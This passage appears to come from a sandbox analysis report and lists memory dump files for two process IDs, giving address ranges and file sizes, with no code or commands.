          • memory/2976-118-0x0000000074380000-0x0000000074A6E000-memory.dmp

            Filesize

            6.9MB

          • memory/2976-119-0x00000000049E0000-0x0000000004A20000-memory.dmp

            Filesize

            256KB

          • memory/2976-111-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-108-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-107-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

            Filesize

            4KB

          • memory/2976-121-0x00000000049E0000-0x0000000004A20000-memory.dmp

            Filesize

            256KB

          • memory/2976-101-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-103-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-150-0x000000000BCA0000-0x000000000CC40000-memory.dmp

            Filesize

            15.6MB

          • memory/2976-117-0x0000000000310000-0x0000000000316000-memory.dmp

            Filesize

            24KB

          • memory/2976-151-0x0000000074380000-0x0000000074A6E000-memory.dmp

            Filesize

            6.9MB

          • memory/2976-126-0x000000000BCA0000-0x000000000C6C8000-memory.dmp

            Filesize

            10.2MB

          • memory/2976-113-0x0000000000400000-0x0000000000430000-memory.dmp

            Filesize

            192KB

          • memory/2976-120-0x0000000074380000-0x0000000074A6E000-memory.dmp

            Filesize

            6.9MB

          • memory/3004-152-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-146-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-147-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-154-0x0000000077140000-0x00000000772E9000-memory.dmp

            Filesize

            1.7MB

          • memory/3004-148-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-144-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-149-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB

          • memory/3004-145-0x000000013F750000-0x00000001406F0000-memory.dmp

            Filesize

            15.6MB